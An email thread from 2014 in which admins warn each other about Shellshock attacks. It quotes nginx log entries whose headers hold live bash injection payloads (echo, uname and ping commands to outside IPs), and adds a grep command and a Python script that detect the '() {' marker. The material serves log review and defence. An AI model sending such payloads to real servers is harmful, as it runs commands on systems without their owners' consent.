Hi Petr, thanks.
So far I have only found this :)
/var/log/nginx/access.log:54.251.83.67 - - [29/Sep/2014:07:26:24 +0200] "GET / HTTP/1.1" 200 612 "-" "() { :;}; /bin/bash -c \x22echo testing9123123\x22; /bin/uname -a"
/var/log/nginx/access.log-20140925.gz:209.126.230.72 - - [24/Sep/2014:23:47:52 +0200] "GET / HTTP/1.0" 200 612 "() { :; }; ping - -c 11 216.75.60.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
/var/log/nginx/access.log-20140926.gz:209.126.230.72 - - [25/Sep/2014:03:52:42 +0200] "GET / HTTP/1.0" 200 612 "() { :; }; ping - -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
/var/log/nginx/access.log-20140926.gz:89.207.135.125 - - [25/Sep/2014:14:38:39 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 162 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
/var/log/nginx/access.log-20140926.gz:198.20.69.74 - - [26/Sep/2014:01:47:24 +0200] "GET / HTTP/1.1" 200 612 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"
On 29.9.2014 at 09:41, Petr Krcmar wrote:
Hi, I just wanted to warn you that attacks on bash are in full swing; according to my log, yesterday someone tried to upload a rootkit to the server and run it. So stay vigilant and patch it.
If you want to see those entries in the log, grep for them:
# grep '() {' /var/log/nginx/*
If you use logrotate and have gzipped logs, use zgrep.
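
The grep/zgrep check from this thread, written out as an added example (not part of the original messages): it reads plain and gzipped nginx logs and reports which logged field (request, referer or user agent) carried the `() {` marker. The "combined" log format, the whitespace-tolerant pattern, the function names and the sample lines are assumptions of this example.

```python
import gzip
import re

# nginx "combined" format: ip - user [time] "request" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
# The thread greps for '() {'; making the whitespace optional is this example's assumption.
MARKER_RE = re.compile(r'\(\)\s*\{')

# Constructed sample lines (documentation IP ranges), not taken from a real log.
SAMPLE = [
    '192.0.2.10 - - [29/Sep/2014:07:26:24 +0200] "GET / HTTP/1.1" 200 612 '
    '"-" "() { :;}; /bin/ping -c 1 198.51.100.7"',
    '192.0.2.11 - - [29/Sep/2014:07:30:00 +0200] "GET / HTTP/1.0" 200 612 '
    '"() { :; }; /bin/ping -c 1 198.51.100.7" "() { :; }; /bin/ping -c 1 198.51.100.7"',
    '192.0.2.12 - - [29/Sep/2014:08:00:00 +0200] "GET /index.html HTTP/1.1" 200 612 '
    '"-" "Mozilla/5.0"',
]

def open_log(path):
    """Open a plain or logrotate-gzipped log as text, as zgrep would."""
    opener = gzip.open if str(path).endswith(".gz") else open
    return opener(path, "rt", encoding="utf-8", errors="replace")

def scan_line(line):
    """Return details of a line carrying the marker, or None."""
    m = LINE_RE.match(line)
    if m is None:
        # Unparseable line: still flag it rather than skip it silently.
        if MARKER_RE.search(line):
            return {"ip": None, "time": None, "status": None, "fields": ["raw"]}
        return None
    fields = [f for f in ("request", "referer", "agent") if MARKER_RE.search(m[f])]
    if not fields:
        return None
    return {"ip": m["ip"], "time": m["time"], "status": int(m["status"]), "fields": fields}

def scan_files(paths):
    """Scan several log files and return the hits together with their file name."""
    hits = []
    for path in paths:
        with open_log(path) as fh:
            for line in fh:
                hit = scan_line(line)
                if hit:
                    hits.append({"file": str(path), **hit})
    return hits
```

The status field only records that nginx answered the request; it does not show whether bash ever processed the header.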